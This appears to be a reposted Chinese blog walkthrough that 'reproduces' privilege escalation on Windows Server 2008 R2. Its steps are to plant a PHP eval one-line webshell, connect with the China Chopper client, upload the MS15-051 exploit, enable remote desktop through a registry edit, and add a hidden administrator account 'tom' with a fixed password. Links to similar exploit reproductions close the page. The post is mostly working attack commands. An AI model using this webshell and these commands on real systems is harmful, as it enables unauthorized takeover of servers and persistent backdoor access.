Windows2008系统漏洞提权复现

Posted 士别三日wyx

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Windows2008系统漏洞提权复现相关的知识,希望对你有一定的参考价值。

操作系统: Windows Server 2008 R2 Enterprise 

Web环境: phpstudy( PHP+Apache+mysql)

第一步,上传一句话木马到Web网站根路径并使用中国菜刀连接

<?php eval($_POST[-7]);?>

 

 

第二步,使用中国菜刀查看系统信息,根据系统没安装的补丁进行提权

 

第三步,使用中国菜刀上传漏洞工具( 此处使用MS15-051漏洞工具)提权

Windows系统的回收站c:\\windows\\Temp目录默认具有上传和执行权限,所以我们将漏洞工具上传至c:\\windows\\Temp目录下

 使用中国菜刀打开虚拟终端,查看当前用户权限

C:\\phpStudy\\PHPTutorial\\WWW\\> c:\\windows\\temp\\ms15-051x64.exe whoami

 

第四步,开启3389( 远程桌面 )端口

上传a.bat文件至c:\\windows\\temp目录下,内容为开启3389端口

REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

 使用中国菜刀打开虚拟终端,执行a.bat文件

C:\\xxx\\WWW\\> c:\\windows\\temp\\ms15-051x64.exe "c:\\windows\\temp\\a.bat"

 查看3389端口是否开启

C:\\xxx\\WWW\\> c:\\windows\\temp\\ms15-051x64.exe "netstat -ano"

 

 第五步,添加管理员用户

添加普通用户tom

c:\\windows\\temp\\ms15-051x64.exe "net user tom 123456.qwer /add"

 将普通用户tom添加至管理员组,拥有管理员权限

c:\\windows\\temp\\ms15-051x64.exe "net localgroup administrators tom /add"

 

第六步,连接远程桌面

物理机开启远程桌面

 

 

 

 

以上是关于Windows2008系统漏洞提权复现的主要内容,如果未能解决你的问题,请参考以下文章

CVE-2019-0708漏洞复现

cve-2019-0708 远程桌面代码执行漏洞复现

操作系统安全_Win7&Win8系列提权漏洞

Sudo提权漏洞复现

CVE-2021-4034_Polkit提权漏洞复现与修复

脏牛Linux本地提权漏洞复现(CVE-2016-5195)